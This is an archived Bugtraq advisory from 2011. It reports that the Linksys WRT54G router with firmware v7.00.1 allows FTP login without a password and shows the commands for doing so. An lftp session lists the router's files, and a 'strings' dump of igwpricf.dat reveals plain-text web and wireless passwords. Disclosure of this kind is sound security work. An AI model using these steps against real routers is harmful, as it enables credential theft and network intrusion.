Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Linksys WRT54G - read router password from file placed on FTP

From: rafdw () poczta fm
Date: Fri, 8 Apr 2011 18:15:36 -0600
Environment: Linksys WRT54G - Firmware Version: v7.00.1 


Default settings of Linksys WRT54G allows to get FTP without password:


rafal@localhost ~ $ lftp 192.168.1.1
lftp 192.168.1.1:~> dir
  size          date       time       name
--------       ------     ------    --------
  956756    Jan-01-2003  02:13:12   ap61.sys          
  224664    Jan-01-2003  02:13:24   igwhtm.dat        
   28528    Jan-01-2003  02:13:26   langpak_en        
   28482    Apr-08-2011  15:36:44   igwpricf.dat      
    2520    Apr-08-2011  15:11:02   nvram.cfg         
    2046    Dec-24-2001  00:02:42   calibra.dat       

lftp 192.168.1.1:~> 


It is possible to download igwpricf.dat file (and another) where plain-text password to web access and wireless network 
are keeping.


rafal@localhost ~ $ strings igwpricf.dat
Linksys
IntotoSoft
192.168.50.3
...
Aadmin
PASSWORD
test
best
...
WIRELESS_PASSWORD
...
default
langpak_en
TELNET
HTTP
SMTP
POP3


-----------------
RaFD
Previous By Date Next
Previous By Thread Next

Current thread: